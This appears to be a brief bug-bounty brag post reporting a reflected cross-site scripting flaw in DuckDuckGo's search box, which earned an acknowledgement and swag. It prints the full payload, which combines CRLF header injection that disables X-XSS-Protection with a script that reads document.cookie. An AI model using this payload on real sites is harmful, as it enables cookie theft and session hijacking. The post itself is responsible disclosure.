Acknowledgement + SWAG by Duck Duck Go
Vulnerability: Reflected Cross Site Scripting XSS
Vuln function: Search box
Payload: ref:xxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr
Got Acknowledgement + SWAG by Duck Duck Go for reporting security vulnerability. :)